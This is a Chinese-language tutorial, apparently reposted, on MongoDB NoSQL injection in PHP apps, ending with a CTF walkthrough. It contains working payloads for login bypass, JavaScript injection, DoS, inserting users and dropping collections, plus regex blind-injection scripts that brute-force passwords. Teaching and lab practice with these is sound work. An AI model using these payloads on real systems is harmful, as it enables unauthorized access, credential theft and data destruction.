从零学习 NoSQL 注入之 Mongodb
Posted 信安之路
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了从零学习 NoSQL 注入之 Mongodb相关的知识,希望对你有一定的参考价值。
本文难度虽然不是很大,不过文章相对完整,有理有据,值得分享。
0x01 NoSQL 和 MongoDB 简介
NoSQL
NoSQL 的概念就不赘述了,以下摘自菜鸟教程。
NoSQL,指的是非关系型的数据库。NoSQL 有时也称作 Not Only SQL 的缩写,是对不同于传统的关系型数据库的数据库管理系统的统称。NoSQL 用于超大规模数据的存储。(例如谷歌或 Facebook 每天为他们的用户收集万亿比特的数据)。这些类型的数据存储不需要固定的模式,无需多余操作就可以横向扩展。
MongoDB
详细概念建议直接看教程 [传送门:
http://www.runoob.com/mongodb/mongodb-tutorial.html
这里就简单的总结几句:
在 mysql 中,我们所熟知的几个最常见的概念是数据库 (Database)、表 (Table)、字段 (Column)、记录 (Record)、索引 (Index),这些术语映射到 MongoDB 中大概等价于数据库 (Database)、集合 (Collection)、域 (Field)、文档 (Document)、索引 (Index)。下面就通过官网文档的几张图略作解释。
文档是由一组键值 (key-value) 对 (即 BSON,Binary JSON) 组成。MongoDB 的文档不需要设置相同的字段,并且相同的字段不需要相同的数据类型,例如:
集合就是 MongoDB 文档组,存在于数据库中,而且它没有固定的结构,这意味着你对集合可以插入不同格式和类型的数据,但通常情况下我们插入集合的数据都会有一定的关联性。下面这张图展示了这三者之间的关系:
好了,前置知识部分介绍到这里,下面开始今天的正文部分:MongoDB 注入
0x02 NoSQL 注入
在讲 MangoDB 注入之前,我们先大致了解一下整个 NoSQL 注入的流程,下面这张图来自 OWASP:
NoSQL 提供了新的数据模型和查询格式,从而可以规避常规的 SQL 注入攻击。但是,它们也为攻击者提供了插入恶意代码的新方法。总的来讲有四种注入手法:
1、重言式
又称为永真式(这个好像是数理逻辑里面的术语),此类攻击是在条件语句中注入代码,使生成的表达式判定结果永远为真,从而绕过认证或访问机制。
2、联合查询
联合查询是一种众所周知的SQL注入技术,攻击者利用一个脆弱的参数去改变给定查询返回的数据集。联合查询最常用的用法是绕过认证页面获取数据。
3、JavaScript 注入
MongoDB Server 支持 javascript,这使得在数据引擎进行复杂事务和查询成为可能,传递不干净的用户输入到这些查询中可以注入任意 JavaScript 代码,导致非法的数据获取或篡改。
4、盲注
当页面没有回显时,那么我们可以通过$regex
正则表达式来达到和 SQL 注入中substr()
函数相同的功能,而且 NoSQL 用到的基本上都是布尔盲注。
下面,我们就主要通过 php 来讲解一下 MongoDB 注入的利用方式,其他语言手法是类似的。
0x03 PHP MongoDB 注入
在 PHP 中使用 MongoDB 你必须使用 MongoDB 的 PHP 驱动:
https://pecl.php.net/package/mongodb
官网上可以看到有很多版本,其中 1.0.0 版本之后,php_mongodb.dll 将不再支持MongoClient
类,也就是说,$m = new MongoClient("mongodb://localhost:27017");
这种调用方式已经被淘汰,而是用命名空间的方式,但是注入的原理是差不多的,这里就主要介绍一下新版 PHP 驱动进行查询操作 MongoDB 的三种方法(为了方便,均以 GET 请求方式为例(一般注入也是发生在查询语句中)。
测试环境
win10
PHP 7.3.4
MongoDB Server 4.2
php_mongodb.dll 1.7.4
重言式注入
利用executeQuery
直接查询:
# 连接数据库
$manager = new MongoDBDriverManager("mongodb://localhost:27017");
$uname = $_GET['username'];
$pwd = $_GET['password'];
# 查询语句
$query = new MongoDBDriverQuery(array(
'uname' => $uname,
'pwd' => $pwd
));
# 执行语句
$result = $manager->executeQuery('test.users', $query)->toArray();
$count = count($result);
if ($count > 0) {
foreach ($result as $user) {
$user = ((array)$user);
echo 'username:' . $user['uname'] . '<br>';
echo 'password:' . $user['pwd'] . '<br>';
}
}
else{
echo 'Not Found';
}
传递的参数是一个数组,比较安全。这种形式叫 ODM
,它会帮你过滤数据,所以一般不用担心原语句被破坏。
ORM
对应关系型数据库,如 MySQL;ODM
对应文档型数据库,如 MongoDB。
当我们用公共用户 ca01h 输入时,显示出 username 和 password:
这是一个正常的输入,数据处理过程如下图所示:
PHP 允许最终用户通过将 URL 参数更改为带有方括号的参数来将 GET 查询字符串输入更改为数组,我们试一下这种输入:
$ne 即 not equal 不等于
amazing~ 所有用户都查出来了,再看一下数据处理过程:
对于 PHP 本身的特性而言,由于其松散的数组特性,导致如果我们输入value=1
那么,也就是输入了一个 value 的值为 1 的数据。如果输入value[$ne]=1
也就意味着value=array($ne=>1)
,在 MongoDB 中,原来的一个单个目标的查询变成了条件查询。同样的,我们也可以使用username[$gt]=&password[$gt]=
作为 payload 进行攻击。
这种方式也是我们通常用来验证网站是否存在 NoSQL 注入的第一步。
联合查询注入
我们都知道在 SQL 时代拼接字符串容易造成 SQL 注入,NoSQL 也有类似问题,但是现在无论是 PHP 的 MongoDB driver 还是 node.js 的 mongoose 都必须要求查询条件必须是一个数组或者 query 对象了,因此简单看一下就好。
示例代码:
string query ="{ username: '" + $username + "', password: '" + $password + "' }"
Payload:
username=admin', $or: [ {}, {'a': 'a&password=' }], $comment: 'successful MongoDB injection'
相当于执行了:
{ username: 'admin', $or: [ {}, {'a':'a', password: '' }], $comment: 'successful MongoDB injection'
这种手法和 SQL 注入比较相似:
select * from logins where username = 'admin' and (password true<> or ('a'='a' and password = ''))
JavaScript 注入
我们知道 MongDB Server 是支持 JavaScript 语言的,这样给开发人员带来了很多非常方便的使用方法,但也是因为它本身的灵活性,造成了 JavaScript 注入。
$where 操作符
在 MongoDB 中 $where 操作符是可以执行 JavaScript 语句的,在 MongoDB 2.4 之前,通过 $where 操作符使用map-reduce
、group
命令可以访问到 mongo shell 中的全局函数和属性。
$manager = new MongoDBDriverManager();
$uname = $_GET['username'];
$pwd = $_GET['password'];
$function = "function() {if(this.uname == '$uname' && this.pwd == '$pwd') return {'username': this.uname, 'password': this.pwd}}";
$query = new MongoDBDriverQuery(array(
'$where' => $function
));
$result = $manager->executeQuery('test.users', $query)->toArray();
$count = count($result);
if ($count>0) {
foreach ($result as $user) {
$user=(array)$user;
echo 'username: '.$user['uname']."<br>";
echo 'password: '.$user['pwd']."<br>";
}
}
else{
echo 'Not Found';
}
MongoDB 2.4 版本之前,可以访问到 db 属性:
?username='||1) return {'username': tojson(db.getCollectionNames()), 'password': 'hacked'}}//&password=1
由此可以扩展出其他的很多类似的 payload。
MongoDB 2.4 版本之后,无法访问全局属性,NoSQL 中的万能密码 payload (单引号闭合):
?username=1&password=admin' || '' = '
相当于执行:
$function = "function() {if(this.uname == 'anything' && this.pwd == 'admin' || '' == '') return {'username': this.uname, 'password': this.pwd}}";
此外还有一个类似于 DOS 攻击的 payload,可以让服务器 CPU 飙升到 100% 持续 5 秒:
?username=1&password=1;(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<5000); return Math.max();})();
eval
注意,eval
使用方式在 Mongo3.0 之后已经被废弃了,而且在官方页面中也没有 Mongo3.0 版本之前的下载链接了,以下的实例代码未经测试,仅提供给大家一个思路,以下代码引用自
https://www.tr0y.wang/2019/04/21/MongoDB%E6%B3%A8%E5%85%A5%E6%8C%87%E5%8C%97/index.html
$manager = new MongoDBDriverManager();
$uname = $_GET['username'];
$pwd = $_GET['password'];
$cmd = new MongoDBDriverCommand([
'eval'=> "db.users.distinct('uname', {uname: '".$uname'})"
]);
echo "db.users.distinct('uname', {uname: '".$uname'})";
$result = $manager->executeCommand('sec_test', $cmd)->toArray();
$result =((array)$result[0])['retval'];
$count = count($result);
if ($count>0) {
foreach ($result as $user) {
$user=(array)$user;
echo 'username: '.$user['uname']." ";
echo 'password: '.$user['pwd']." ";
}
}
else{
echo 'Not Found';
}
往 users 集合插入攻击者用户:
?username=1'});db.users.insert({"username":"ca01h","password":"1"});db.users.find({'username':'2
删掉 users 集合:
?username=1'});db.users.drop();db.users.find({'username':'2
mapReduce
MongoDB 中的mapReduce
函数有点类似于 MySQL 中的group by
操作,下面是一个官方文档的例子,在集合 orders 中查找 status:"A" 的数据,并根据 cust_id 来分组,并计算 amount 的总和:
简单的解释一下:
map
函数用于分组:
function map(){ emit(param1, param2); }
param1:需要分组的字段,this.字段名;
param2:需要进行统计的字段,this.字段名。
reduce
函数用于处理需要统计的字段:
function reduce(key, values){ // 统计字段处理 }
key: 指分组字段(emit的param1)对应的值;
values:指需要统计的字段(emit的param2)值组成的数组。
Map 函数和 Reduce 函数可以使用 JavaScript 来实现,使得 MapReduce 的使用非常灵活和强大。但是同样也带来了隐患,假设有这样的一个业务场景,数据库中存储了一个store
集合,有一系列商品的名称、价格和数量,我们想得到相同商品的价格或者数量的总和,代码如下:
require_once __DIR__ . "/vendor/autoload.php";
$param = $_POST['param'];
$collection = (new MongoDBClient)->test->stores;
$map = "function() {
for (var i = 0; i < this.items.length; i++) {
emit(this.name, this.items[i].$param); }
}";
$reduce = "function(name, sum) { return Array.sum(sum); }";
$opt = "{ out: 'totals' }";
$results = $collection->mapReduce($map, $reduce, $out);
该代码应该在$param
给定的字段上求和,但是这同样给了攻击者可乘之机,如果$param
是这样:
a);}},function(kv) { return 1; }, { out: ‘x’ });
db.injection.insert({success:1}); return 1;
db.stores.mapReduce(function() { { emit(1,1
那么在 MongoDB 中就相当于执行了下面这条语句:
db.stores.mapReduce(function() {
for (var i=0; i < this.items.length; i++) {
emit(this.name, this.items[i].a);
}
},
function(kv) { return 1; }, { out: 'x' });
db.injection.insert({success:1}); return 1;
db.stores.mapReduce(function() { { emit(1,1); } },
function(name, sum) {
return Array.sum(sum); }, { out: 'totals' });"
相当于直接控制了整个 MongoDB 的操作。
但我们也同时发现,构建这样的 payload 是有一定难度的,需要我们对 MongoDB,JavaScript 和业务都有足够的了解,这也是 NoSQL 注入的局限性。但是,这个例子也告诉我们有用户输入的地方就有危险存在,比如后面有一个 CTF 题目,用的也是 MongoDB 中的聚合函数aggregate
,因为一个 GET 参数而存在注入漏洞。
盲注
回想一想上面的例子,假如页面只是告诉你成功或者失败,那么就是我们在 MySQL 里遇到的布尔盲注了。布尔盲注重点在于怎么逐个提取字符,MySQL 里我们可以采用substr
,而在 MongoDB 里我们有 $regex
正则表达式。下面是一些常用的盲注。
已知某一个用户名的前提下判断的密码长度:
?username[$eq]=ca01h&password[$regex]=.{5}
逐位提取字符:
# url格式
?username[$eq]=ca01h&password[$regex]=c.{4}
?username[$eq]=ca01h&password[$regex]=ca.{3}
?username[$eq]=ca01h&password[$regex]=ca0.{2}
?username[$eq]=ca01h&password[$regex]=c.*
?username[$eq]=ca01h&password[$regex]=ca.*
# json格式
{"username": {"$eq": "ca01h"}, "password": {"$regex": "^c" }}
{"username": {"$eq": "ca01h"}, "password": {"$regex": "^ca" }}
{"username": {"$eq": "ca01h"}, "password": {"$regex": "^ca0" }}
当然,提到盲注肯定少不了脚本:
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username = 'admin'
password = ''
target = 'http://127.0.0.1/mongo/test.php'
while True:
for c in string.printable:
if c not in ['*', '+', '.', '?', '|', '#', '&', '$']:
payload = '?username=%s&password[$regex]=^%s' % (username, password + c)
r = requests.get(target + payload)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
爆破密码结果如下:
类似的还有 POST 的版本:
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
target = 'http://127.0.0.1/mongo/test.php'
headers = {'content-type': 'application/json'}
while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload = '{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(target, data = payload, headers = headers, verify = False, allow_redirects = False)
if 'OK' in r.text or r.status_code == 302:
print("Found one more char : %s" % (password+c))
password += c
当然这里的脚本还是有一些改进的地方,比如可以首先判断用户名或密码长度,而且上面代码去掉了一些特殊字符等等的。这里就不再多做演示了,刚好下面有一个实例靶机是需要写 Python 脚本盲注 MongoDB,那个代码考虑的问题更多,可以稍微看一下。
0x04 Node.JS MongoDB 注入
技巧跟 PHP MongoDB 是类似的,这里就提供一些 Node.JS 的靶场给大家练练手:
https://pockr.org/bug-environment/detail?environment_no=env_75b82b98ffedbe0035
https://github.com/ricardojoserf/NoSQL-injection-example
0x05 MongoDB 注入实例
CTF NopeSQL
https://cybrics.net/tasks/nopesql
扫描网站发现有 Git 源码泄露,用 GitHack 工具获得index.php
源码:
require_once __DIR__ . "/vendor/autoload.php";
function auth($username, $password) {
$collection = (new MongoDBClient('mongodb://localhost:27017/'))->test->users;
$raw_query = '{"username": "'.$username.'", "password": "'.$password.'"}';
$document = $collection->findOne(json_decode($raw_query));
if (isset($document) && isset($document->password)) {
return true;
}
return false;
}
$user = false;
if (isset($_COOKIE['username']) && isset($_COOKIE['password'])) {
$user = auth($_COOKIE['username'], $_COOKIE['password']);
}
if (isset($_POST['username']) && isset($_POST['password'])) {
$user = auth($_POST['username'], $_POST['password']);
if ($user) {
setcookie('username', $_POST['username']);
setcookie('password', $_POST['password']);
}
}
if ($user == true):
Welcome!
<div>
Group most common news by
<a href="?filter=$category">category</a> |
<a href="?filter=$public">publicity</a><br>
</div>
$filter = $_GET['filter'];
$collection = (new MongoDBClient('mongodb://localhost:27017/'))->test->news;
$pipeline = [
['$group' => ['_id' => '$category', 'count' => ['$sum' => 1]]],
['$sort' => ['count' => -1]],
['$limit' => 5],
];
$filters = [
['$project' => ['category' => $filter]]
];
$cursor = $collection->aggregate(array_merge($filters, $pipeline));
if (isset($filter)):
foreach ($cursor as $category) {
printf("%s has %d news<br>", $category['_id'], $category['count']);
}
endif;
else:
if (isset($_POST['username']) && isset($_POST['password'])):
Invalid username or password
endif;
<form action='/' method="POST">
<input type="text" name="username">
<input type="password" name="password">
<input type="submit">
</form>
<h2>News</h2>
$collection = (new MongoDBClient('mongodb://localhost:27017/'))->test->news;
$cursor = $collection->find(['public' => 1]);
foreach ($cursor as $news) {
printf("%s<br>", $news['title']);
}
endif;
第一步是利用重言式注入登录,但是有点不同的是,输入的参数被双引号包括,所以我们必须想办法闭合这个双引号,payload:
username=1&password=","password":{"$ne"=null}, "username":admin"
这里如果直接使用{"$ne":null}
会出现 500 的错误:
代码:
var_dump(json_decode($raw_query));
输出:
object(stdClass)
[ ]=>
string(12) "{'$ne':null}"
[ ]=>
string(12) "{'$ne':null}"
}
发现{'$ne':null}
被解析成了 string 而不是 array。前一个 payload 虽然username
和password
重复了,但json_decode
时变量只会是最后一次的赋值。
登录成功后
filter 参数里可以填 category
展示目录 text
展示内容 title
展示标题,但是都限制了5条。
代码里是用的 MongoDB 聚合函数aggregate
,下面这张图也是来自官方文档,解释了aggregate
函数的执行过程:
使用aggregate
聚合函数时,在里面是可以使用条件判断语句的。在 MongoDB 中$cond
表示if判断语句,匹配的符号使用$eq
,连起来为[$cond][if][$eq]
,当使用多个判断条件时重复该语句即可。
官方文档列出的$cond
的用法:
官方文档的例子:
https://docs.mongodb.com/manual/reference/operator/aggregation/cond/
db.inventory.aggregate(
[
{
$project:
{
item: 1,
discount:
{
$cond: { if: { $gte: [ "$qty", 250 ] }, then: 30, else: 20 }
}
}
}
]
)
现在我们的目的是:如果$category
的值是 flag,那么就输出$title
的内容,否则还是原样输出$catagory
,照着上面的例子写成 MongoDB shell 的形式就是:
db.news.aggregate(
[
{
$project:
{
category:
{
$cond: { if: { $eq: [ "$category", "flags" ] }, then: $title, else: $category }
}
}
}
]
)
转换成 PHP 数组形式传入 filter 参数:
?filter[$cond][if][$eq][]=flags&filter[$cond][if][$eq][]=$category&filter[$cond][then]=$title&filter[$cond][else]=$category
转换成raw_query
的形式:
{
"category":
{
"$cond":
{
"if":
{
"$eq": [ "$category", "flags" ]
},
"then": "$title",
"else": "$category"
}
}
}
var_dump(json_decode(raw_query))
即为:
object(stdClass)
[ ]=>
object(stdClass)
[ ]=>
object(stdClass)
[ ]=>
object(stdClass)
[ ]=>
array(2) {
[ ]=>
string(9) "$category"
[ ]=>
string(5) "flags"
}
}
[ ]=>
string(6) "$title"
[ ]=>
string(9) "$category"
}
}
}
接着直接修改$title
为$text
查看:
成功拿到 flag~
HTB Mongo
最近做了一个 HackTheBox 的靶机,主要考察的就是写 Python 脚本盲注 MongoDB 的过程,限于篇幅原因,就不把 walkthrough 贴在这里了,感兴趣的同学可以移步于此:
https://ca0y1h.top/Target_drone/HackTheBox/5.HTB-Mongo-walkthrough/
0x06 工具
Github 上有个工具叫 NoSQLAttack, 不过已经没有维护了:
https://github.com/youngyangyang04/NoSQLAttack
另外还有一个 NoSQLMap 工具,这个项目作者仍在维护:
https://github.com/codingo/NoSQLMap
0x07 参考资料
https://www.runoob.com/mongodb/
https://pockr.org/activity/detail?activity_no=act_761e1e744d8aa16823#sp_26a751c506f61078b0
https://www.mi1k7ea.com/2019/08/11/NoSQL%E6%B3%A8%E5%85%A5%E4%B9%8BMongoDB/#0x03-NoSQL%E6%B3%A8%E5%85%A5
https://www.tr0y.wang/2019/04/21/MongoDB%E6%B3%A8%E5%85%A5%E6%8C%87%E5%8C%97/index.html
https://nullsweep.com/a-nosql-injection-primer-with-mongo/
https://zanon.io/posts/nosql-injection-in-mongodb
以上是关于从零学习 NoSQL 注入之 Mongodb的主要内容,如果未能解决你的问题,请参考以下文章